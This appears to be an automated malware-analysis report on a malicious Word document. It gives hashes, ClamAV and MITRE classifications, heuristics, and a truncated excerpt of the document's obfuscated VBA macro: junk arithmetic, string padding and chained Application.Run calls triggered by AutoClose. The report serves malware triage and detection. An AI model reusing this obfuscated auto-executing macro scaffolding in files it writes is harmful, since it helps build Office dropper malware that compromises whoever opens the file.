Office (OOXML) malware analysis — malicious · 3242a4619e62c021

MALICIOUS

Office (OOXML)

59.3 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-09-30

MD5: a681c2e270cf7eee52734f2b15bbb581 SHA-1: c297c8b395efd97be4812059ef0e9e6d5cd95c4f SHA-256: 3242a4619e62c021efaad36a702329f1385b709cc65aaf66c335b8ff8a3764fb

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This OOXML document contains VBA macros, specifically an Auto_Close macro that utilizes CreateObject to execute a second-stage payload. The presence of VBA macros and the Auto_Close execution trigger strongly suggest a malicious document intended for initial compromise via spearphishing. The specific payload executed by Application.Run is not directly discernible from the provided script excerpts, leading to an 'unknown family' classification.

Heuristics 6

ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	13483 bytes
SHA-256: `852c778f2962e76eb2024b34c24168ce14beb34ee6f35c7fb2270dbc0a5af2fe`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub ddZSINbyLKwgMY() jrSzDKTG = "OFwYJIXWrfWMrJ" + "FScoCYcSLSOk" + "vpLGVFSiYZ" bNjBzGZYny = Left("bMpoWMnrQy", 1) + Left("fncPKLxQAX", 7) + "CdCnXpXHJUZKJpB" HCRxVLyo = LTrim("dGvFSzMKbwFWGWFNYqXUkXBO") + "kxqjCRGuF" + "LpANOKLYgKBwF" Application.Run "nRKqqScIPcPJCP" IjcIGTbzHu = Atn(905.95) - 93.34 - 960.61 - 848.22 wRwQBOFw = Atn(853.64) + 441.88 + 732.54 + Atn(441.98) + 790.2 + Atn(496.3) + 778.85 NuSZHuWpk = Atn(155.21) + Atn(986.24) + Atn(626.62) + Atn(546.44) VgoojDpOn = Atn(229.83) + Atn(408.36) + 725 kCWuRLkVc = RTrim("CD") + "oioIqZDFIMzMOxjVJ" + "OzCwcBZPYSpIFiUp" End Sub Sub ydTknTgvZjPYEr() XkIrzMB = Left("xAAuvOcriq", 6) + Left("LufbpovRKG", 6) + Left("oUGBEIpPuR", 4) + "fRpSXCGjdbOOcn" ZucuWWIAyYz = RTrim("oxzpvkXjnfDLLdJGiFCcxFH") + "gfkzHHUMiFPywLnV" + "pISCSxQEMkQBqgdjEOuVXoOICggGHC" + LTrim("YnbKzcNiKEVCVDEuUvcLRRApzvkcVM") UPXvrnyjZQQ = 324.1 - Atn(739.39) - 574.45 - 47.12 Application.Run "PbjBzYLOLMBpkWS" BQPRdwE = 619.2 - 267.25 - 320.55 - 746.51 - 13.22 - 91.29 jKoOIfyvf = 383.42 - Atn(546.64) - Atn(831.27) - 708.41 gQzjxrYxDfx = 303.37 + Atn(867.65) oGNGYUj = "IibEjgcpUGKIXNM" + "DNVEWU" + Left("uGOrDOvNSV", 3) + Left("ZkURCkFKwR", 4) End Sub Public Function RFDTUEwyjriOCQBKnE(dUndMyuPdHjBEWQv, zTjFCAfvggUFOYOfzJ, qEkgWfkEAEPVITD) ZpVGjOBnkA = Atn(262.42) - 604.22 - 944.82 - Atn(750.29) xiHzPZXTY = RTrim("EdJUf") + LTrim("YqccxT") QxIFcEASMjY = "zEFVBfIS" + "jICHBMEYRoNMSVBrIZGL" + "wuMNqVqZVKf" + "VdMy" + "fSwCrVOpH" + "f" HTDjyZDq = "NJHFwLrKRwnF" + Left("jnnTCcPKff", 6) + "MVTfOuoDPvoY" + Left("kYPMVByYRW", 4) + Left("vxOVizouui", 9) rnnOipzXfGJ = 944.49 - 706.68 - Atn(451.95) - Atn(397.13) - Atn(263.6) jvBHGBEpF = 549.3 + 28.35 + 459.34 + 559.35 + Atn(548.23) RurboUUz = RTrim("jzRyWkENCbqMKWH") + "IXNuWjRnITU" MTEqJJkWATR = 734.46 + 800.64 + 190.37 + 627 + Atn(327.37) + 9.83 + 894.21 RFDTUEwyjriOCQBKnE = Replace(dUndMyuPdHjBEWQv, zTjFCAfvggUFOYOfzJ, qEkgWfkEAEPVITD) njWOzxyWU = 589.87 + Atn(364.13) UwFJoYziT = 923.4 + 695.65 + Atn(106.51) SEYgGMSzbZZ = Atn(25.86) - 202.78 - Atn(754.36) - Atn(146.7) - 349.39 AFXrBzU = "HB" + "VVVV" + "Fp" HqMPUMIbdbT = 455.72 - Atn(376.14) - Atn(310.6) - 978.82 gvyqqpv = "JNI" + "EuPxWgHgcvcPFv" + "XjMpDrLvUVWN" + Left("FIWbjPPXSw", 8) KLPDoAYPuHy = "d" + LTrim("FHVivBQk") + RTrim("WEMfAKVycJ") + "MFfAGkUWAqiTcoqxHRrdRBJZWY" yIbroIwObL = "ZpoEziGZHfWfyiU" + LTrim("GMOBVzPQOiNfRjgA") + LTrim("cfzpinQxuZCWSw") woXoiMXxV = Atn(413.71) + 602.92 QPWzjUoy = "bLiYrdEDyJ" + Left("UiAzVOipbp", 3) nMIykCiVqLF = "ITLciczkZBcnkOqygYuKRNUvNipo" + "MHL" + "FHuAynIYTjTcZLWHADjgqSvGczTAV" + "zJROMozJvVMRyWGpDZvxO" INvwXbAViJz = Atn(579.19) + Atn(932.47) + 587.75 + Atn(890.5) + Atn(682.68) + Atn(308.76) MTNOKVGFKSjC = RTrim("SDTTWckJHpQiMdvbGY") + "Wb" + RTrim("WOzYLjyCYErYCqHDAjqNGGQLfw") MkGqETkKMfN = LTrim("HIZwCZXCTCckwTGUcrzHDEVPS") + RTrim("OMWdLnuIrMczPfgfTKWL") + LTrim("qwrHCIqHnCUVIPjiBSCwWDVnO") rzobwTCiE = "ANT" + Left("vRKXuGKEZI", 2) + "HwwWoFoIFNkBMi" End Function Sub nRKqqScIPcPJCP() ZYxVyBXKBKDC = 908.28 - 327.6 xnWEzNCEvrDX = 134.94 - 84.76 - Atn(133.43) FYVxXIE = Atn(822.94) - 735.52 fnAfNzn = 408.52 + Atn(747.31) + Atn(670.75) + 21.82 + 143.98 + 882.19 + Atn(578.95) zkkGwKf = Atn(329.1) + 477.2 + 146.8 + Atn(181.37) + 925.23 + 221.33 Application.Run "wzFUOFOLziqcvN" XHWSqcN = 96.71 + Atn(62.2) + 260.69 + 910.52 + Atn(729.88) KOIPSPCLVqyR = 580.9 + 530.51 + Atn(463.22) + 597.85 yJwguqzuxj = LTrim("xBPFikHkGOGBbLRJvWWzTWYbALF") + "OgISkDzKWHJgHiJJqrqoE" + LTrim("VnYNrNFxnpfYvfZ") + LTrim("YKJAdRFyDd") End Sub Sub AutoClose() xMQZXqKOQrTc = Atn(664.2) - Atn(589.48) fTjxYzRV = RTrim("pyikV") + LTrim("pAwdUnLZIRBXFDFWqYuwT") + RTrim("MHZGUvJxNgIACNWwRFZnZBRHMNTI") yOxPRkuJg = "jNBMcVoxNHrvF ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	38912 bytes
SHA-256: `87cb388e257fb42c3d3a2a928e99097c2c1edc20d97a3f8b2d9b2253a48e7889`
Detection ClamAV: Doc.Malware.Emooodldr-6711604-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.